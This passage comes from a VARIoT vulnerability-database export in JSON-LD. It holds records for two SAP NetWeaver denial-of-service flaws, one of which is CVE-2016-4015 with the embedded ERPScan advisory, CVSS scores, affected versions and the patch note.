"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "bea17582-1f91-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
}
],
"cvssV3": [],
"severity": [
{
"author": "IVD",
"id": "bea17582-1f91-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "bea17582-1f91-11e6-abef-000c29c66e3d"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. There is an error in the authentication mechanism in the J2EE engine, and an attacker can bypass the authentication mechanism for a denial of service attack",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-2388"
},
{
"db": "IVD",
"id": "bea17582-1f91-11e6-abef-000c29c66e3d"
}
],
"trust": 0.72
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2011-2388",
"trust": 0.8
},
{
"db": "IVD",
"id": "BEA17582-1F91-11E6-ABEF-000C29C66E3D",
"trust": 0.2
}
],
"sources": [
{
"db": "IVD",
"id": "bea17582-1f91-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-2388"
}
]
},
"id": "VAR-201106-0305",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "bea17582-1f91-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-2388"
}
],
"trust": 1.06917922
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.8
}
],
"sources": [
{
"db": "IVD",
"id": "bea17582-1f91-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-2388"
}
]
},
"last_update_date": "2022-05-17T02:08:17.630000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Patch for SAP NetWeaver Denial of Service Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/4229"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-2388"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.6,
"url": "http://dsecrg.com/pages/vul/show.php?id=326"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-2388"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "bea17582-1f91-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-2388"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-06-22T00:00:00",
"db": "IVD",
"id": "bea17582-1f91-11e6-abef-000c29c66e3d"
},
{
"date": "2011-06-22T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-2388"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-06-22T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-2388"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Denial of service vulnerability",
"sources": [
{
"db": "IVD",
"id": "bea17582-1f91-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-2388"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Denial of service",
"sources": [
{
"db": "IVD",
"id": "bea17582-1f91-11e6-abef-000c29c66e3d"
}
],
"trust": 0.2
}
}
var-201604-0122
Vulnerability from variot
The Enqueue Server in SAP NetWeaver JAVA AS 7.1 through 7.4 allows remote attackers to cause a denial of service (process crash) via a crafted request, aka SAP Security Note 2258784. An attacker can exploit this issue to cause denial-of-service conditions. ADVISORY INFORMATION
Title: SAP NetWeaver Enqueue Server – DoS vulnerability
Advisory ID: [ERPSCAN-16-019]
Risk: high
Advisory URL: https://erpscan.com/advisories/erpscan-16-019-sap-netweaver-enqueue-server-dos-vulnerability/
Date published: 12.04.2016
Vendors contacted: SAP
- VULNERABILITY INFORMATION
Class: denial of service
Impact: denial of service
Remotely Exploitable: Yes
Locally Exploitable: No
CVE: CVE-2016-4015
CVSS Information
CVSS Base Score v3: 7.5 / 10
CVSS Base Vector:
AV : Attack Vector (Related exploit range) Network (N)
AC : Attack Complexity (Required attack complexity) Low (L)
PR : Privileges Required (Level of privileges needed to exploit) None (N)
UI : User Interaction (Required user participation) None (N)
S : Scope (Change in scope due to impact caused to components beyond the vulnerable component) Unchanged (U)
C : Impact to Confidentiality None (N)
I : Impact to Integrity None (N)
A : Impact to Availability High (H)
- VULNERABLE PACKAGES
SAP NetWeaver Enqueue Server 7.4
Other versions are probably affected too, but they were not checked.
- SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, install SAP Security Note 2258784
- AUTHOR
Vahagn Vardanyan (ERPScan)
- TECHNICAL DESCRIPTION
Enqueue Server allows an anonymous attacker to prevent legitimate users from accessing the service, either by crashing or flooding it.
- REPORT TIMELINE
Sent: 04.12.2015
Vendor response: 05.12.2015
Date of Public Advisory: 12.04.2016
- REFERENCES
https://erpscan.com/advisories/erpscan-16-019-sap-netweaver-enqueue-server-dos-vulnerability/
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4015
- ABOUT ERPScan Research
The company’s expertise is based on the research subdivision of ERPScan, which is engaged in vulnerability research and analysis of critical enterprise applications. It has achieved multiple acknowledgments from the largest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for discovering more than 400 vulnerabilities in their solutions (200 of them just in SAP!).
ERPScan researchers are proud to have exposed new types of vulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be nominated for the best server-side vulnerability at BlackHat 2013.
ERPScan experts have been invited to speak, present, and train at 60+ prime international security conferences in 25+ countries across the continents. These include BlackHat, RSA, HITB, and private SAP trainings in several Fortune 2000 companies.
ERPScan researchers lead the project EAS-SEC, which is focused on enterprise application security research and awareness. They have published 3 exhaustive annual award-winning surveys about SAP security.
ERPScan experts have been interviewed by leading media resources and featured in specialized info-sec publications worldwide. These include Reuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise, and Chinabyte, to name a few.
We have highly qualified experts in staff with experience in many different fields of security, from web applications and mobile/embedded to reverse engineering and ICS/SCADA systems, accumulating their experience to conduct the best SAP security research.
- ABOUT ERPScan
ERPScan is the most respected and credible Business Application Security provider. Founded in 2010, the company operates globally and enables large Oil and Gas, Financial and Retail organizations to secure their mission-critical processes. Named as an ‘Emerging Vendor’ in Security by CRN, listed among “TOP 100 SAP Solution providers” and distinguished by 30+ other awards, ERPScan is the leading SAP SE partner in discovering and resolving security vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to assist in improving the security of their latest solutions.
ERPScan’s primary mission is to close the gap between technical and business security, and provide solutions to evaluate and secure SAP and Oracle ERP systems and business-critical applications from both, cyber-attacks as well as internal fraud. Usually our clients are large enterprises, Fortune 2000 companies and managed service providers whose requirements are to actively monitor and manage security of vast SAP landscapes on a global scale.
We ‘follow the sun’ and function in two hubs, located in the Palo Alto and Amsterdam to provide threat intelligence services, agile support and operate local offices and partner network spanning 20+ countries around the globe.
Adress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301
Phone: 650.798.5255
Twitter: @erpscan
Scoop-it: Business Application Security
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201604-0122",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.3"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.1"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.4"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.2"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.1 to 7.4"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-002169"
},
{
"db": "NVD",
"id": "CVE-2016-4015"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-308"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.3:*:*:*:java_as:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.2:*:*:*:java_as:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.4:*:*:*:java_as:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.1:*:*:*:java_as:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2016-4015"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported the issue.",
"sources": [
{
"db": "BID",
"id": "87591"
}
],
"trust": 0.3
},
"cve": "CVE-2016-4015",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": true,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.0,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2016-4015",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2016-4015",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2016-4015",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201604-308",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2016-4015",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2016-4015"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002169"
},
{
"db": "NVD",
"id": "CVE-2016-4015"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-308"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The Enqueue Server in SAP NetWeaver JAVA AS 7.1 through 7.4 allows remote attackers to cause a denial of service (process crash) via a crafted request, aka SAP Security Note 2258784. \nAn attacker can exploit this issue to cause denial-of-service conditions. ADVISORY INFORMATION\n\nTitle: SAP NetWeaver Enqueue Server \u2013 DoS vulnerability\n\nAdvisory ID: [ERPSCAN-16-019]\n\nRisk: high\n\nAdvisory URL: https://erpscan.com/advisories/erpscan-16-019-sap-netweaver-enqueue-server-dos-vulnerability/\n\nDate published: 12.04.2016\n\nVendors contacted: SAP\n\n\n2. VULNERABILITY INFORMATION\n\nClass: denial of service\n\nImpact: denial of service\n\nRemotely Exploitable: Yes\n\nLocally Exploitable: No\n\nCVE: CVE-2016-4015\n\n\n\nCVSS Information\n\nCVSS Base Score v3: 7.5 / 10\n\nCVSS Base Vector:\n\nAV : Attack Vector (Related exploit range) Network (N)\n\nAC : Attack Complexity (Required attack complexity) Low (L)\n\nPR : Privileges Required (Level of privileges needed to exploit) None (N)\n\nUI : User Interaction (Required user participation) None (N)\n\nS : Scope (Change in scope due to impact caused to components beyond\nthe vulnerable component) Unchanged (U)\n\nC : Impact to Confidentiality None (N)\n\nI : Impact to Integrity None (N)\n\nA : Impact to Availability High (H)\n\n\n\n3. VULNERABLE PACKAGES\n\nSAP NetWeaver Enqueue Server 7.4\n\nOther versions are probably affected too, but they were not checked. \n\n\n5. SOLUTIONS AND WORKAROUNDS\n\nTo correct this vulnerability, install SAP Security Note 2258784\n\n\n\n6. AUTHOR\n\nVahagn Vardanyan (ERPScan)\n\n\n\n7. TECHNICAL DESCRIPTION\n\nEnqueue Server allows an anonymous attacker to prevent legitimate\nusers from accessing the service, either by crashing or flooding it. \n\n\n\n8. REPORT TIMELINE\n\nSent: 04.12.2015\n\nVendor response: 05.12.2015\n\nDate of Public Advisory: 12.04.2016\n\n\n\n9. REFERENCES\n\nhttps://erpscan.com/advisories/erpscan-16-019-sap-netweaver-enqueue-server-dos-vulnerability/\n\nhttps://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4015\n\n\n10. ABOUT ERPScan Research\n\nThe company\u2019s expertise is based on the research subdivision of\nERPScan, which is engaged in vulnerability research and analysis of\ncritical enterprise applications. It has achieved multiple\nacknowledgments from the largest software vendors like SAP, Oracle,\nMicrosoft, IBM, VMware, HP for discovering more than 400\nvulnerabilities in their solutions (200 of them just in SAP!). \n\nERPScan researchers are proud to have exposed new types of\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\nnominated for the best server-side vulnerability at BlackHat 2013. \n\nERPScan experts have been invited to speak, present, and train at 60+\nprime international security conferences in 25+ countries across the\ncontinents. These include BlackHat, RSA, HITB, and private SAP\ntrainings in several Fortune 2000 companies. \n\nERPScan researchers lead the project EAS-SEC, which is focused on\nenterprise application security research and awareness. They have\npublished 3 exhaustive annual award-winning surveys about SAP\nsecurity. \n\nERPScan experts have been interviewed by leading media resources and\nfeatured in specialized info-sec publications worldwide. These include\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\nHeise, and Chinabyte, to name a few. \n\nWe have highly qualified experts in staff with experience in many\ndifferent fields of security, from web applications and\nmobile/embedded to reverse engineering and ICS/SCADA systems,\naccumulating their experience to conduct the best SAP security\nresearch. \n\n\n\n11. ABOUT ERPScan\n\nERPScan is the most respected and credible Business Application\nSecurity provider. Founded in 2010, the company operates globally and\nenables large Oil and Gas, Financial and Retail organizations to\nsecure their mission-critical processes. Named as an \u2018Emerging Vendor\u2019\nin Security by CRN, listed among \u201cTOP 100 SAP Solution providers\u201d and\ndistinguished by 30+ other awards, ERPScan is the leading SAP SE\npartner in discovering and resolving security vulnerabilities. ERPScan\nconsultants work with SAP SE in Walldorf to assist in improving the\nsecurity of their latest solutions. \n\nERPScan\u2019s primary mission is to close the gap between technical and\nbusiness security, and provide solutions to evaluate and secure SAP\nand Oracle ERP systems and business-critical applications from both,\ncyber-attacks as well as internal fraud. Usually our clients are large\nenterprises, Fortune 2000 companies and managed service providers\nwhose requirements are to actively monitor and manage security of vast\nSAP landscapes on a global scale. \n\nWe \u2018follow the sun\u2019 and function in two hubs, located in the Palo Alto\nand Amsterdam to provide threat intelligence services, agile support\nand operate local offices and partner network spanning 20+ countries\naround the globe. \n\n\n\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\n\nPhone: 650.798.5255\n\nTwitter: @erpscan\n\nScoop-it: Business Application Security\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-4015"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002169"
},
{
"db": "BID",
"id": "87591"
},
{
"db": "VULMON",
"id": "CVE-2016-4015"
},
{
"db": "PACKETSTORM",
"id": "137918"
}
],
"trust": 2.07
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2016-4015",
"trust": 2.9
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002169",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201604-308",
"trust": 0.6
},
{
"db": "BID",
"id": "87591",
"trust": 0.4
},
{
"db": "VULMON",
"id": "CVE-2016-4015",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "137918",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2016-4015"
},
{
"db": "BID",
"id": "87591"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002169"
},
{
"db": "PACKETSTORM",
"id": "137918"
},
{
"db": "NVD",
"id": "CVE-2016-4015"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-308"
}
]
},
"id": "VAR-201604-0122",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T12:57:39.066000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Security Notes April 2016 - DoS vulnerabilities on the rise (2258784)",
"trust": 0.8,
"url": "https://scn.sap.com/community/security/blog/2016/04/14/sap-security-notes-april-2016--dos-vulnerabilities-on-the-rise"
},
{
"title": "SAP NetWeaver AS JAVA Enqueue Server Fixes for component denial of service vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=60963"
},
{
"title": "netFuzz",
"trust": 0.1,
"url": "https://github.com/ameng929/netfuzz "
},
{
"title": "netFuzz",
"trust": 0.1,
"url": "https://github.com/vah13/netfuzz "
},
{
"title": "SAP_vulnerabilities",
"trust": 0.1,
"url": "https://github.com/vah13/sap_vulnerabilities "
},
{
"title": "radamsa-Fuzzer",
"trust": 0.1,
"url": "https://github.com/sunzu94/radamsa-fuzzer "
},
{
"title": "RADAMSA",
"trust": 0.1,
"url": "https://github.com/stephenharuna/radamsa "
},
{
"title": "radamsa",
"trust": 0.1,
"url": "https://github.com/hwangtaewon/radamsa "
},
{
"title": "radamsa",
"trust": 0.1,
"url": "https://github.com/benoit-a/radamsa "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2016-4015"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002169"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-308"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2016-4015"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.5,
"url": "https://erpscan.com/advisories/erpscan-16-019-sap-netweaver-enqueue-server-dos-vulnerability/"
},
{
"trust": 1.1,
"url": "https://erpscan.io/press-center/blog/dos-vulnerabilities-on-the-rise-sap-security-notes-april-2016/"
},
{
"trust": 1.1,
"url": "https://erpscan.io/advisories/erpscan-16-019-sap-netweaver-enqueue-server-dos-vulnerability/"
},
{
"trust": 0.9,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-4015"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-4015"
},
{
"trust": 0.6,
"url": "https://erpscan.com/press-center/blog/dos-vulnerabilities-on-the-rise-sap-security-notes-april-2016/"
},
{
"trust": 0.3,
"url": "http://www.sap.com"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/.html"
},
{
"trust": 0.1,
"url": "https://www.securityfocus.com/bid/87591"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/ameng929/netfuzz"
},
{
"trust": 0.1,
"url": "https://github.com/vah13/netfuzz"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-4015"
},
{
"trust": 0.1,
"url": "http://sap.com"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2016-4015"
},
{
"db": "BID",
"id": "87591"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002169"
},
{
"db": "PACKETSTORM",
"id": "137918"
},
{
"db": "NVD",
"id": "CVE-2016-4015"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-308"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2016-4015"
},
{
"db": "BID",
"id": "87591"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002169"
},
{
"db": "PACKETSTORM",
"id": "137918"
},
{
"db": "NVD",
"id": "CVE-2016-4015"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-308"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-04-14T00:00:00",
"db": "VULMON",
"id": "CVE-2016-4015"
},
{
"date": "2016-04-12T00:00:00",
"db": "BID",
"id": "87591"
},
{
"date": "2016-04-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-002169"
},
{
"date": "2016-07-14T18:32:22",
"db": "PACKETSTORM",
"id": "137918"
},
{
"date": "2016-04-14T14:59:10.130000",
"db": "NVD",
"id": "CVE-2016-4015"
},
{
"date": "2016-04-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201604-308"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-12-10T00:00:00",
"db": "VULMON",
"id": "CVE-2016-4015"
},
{
"date": "2016-04-12T00:00:00",
"db": "BID",
"id": "87591"
},
{
"date": "2016-04-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-002169"
},
{
"date": "2018-12-10T19:29:17.657000",
"db": "NVD",
"id": "CVE-2016-4015"
},
{
"date": "2016-04-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201604-308"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201604-308"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver JAVA AS Service disruption in the existing enqueue server (DoS) Vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-002169"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "lack of information",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201604-308"
}
],
"trust": 0.6
}
}
var-201705-4094
Vulnerability from variot
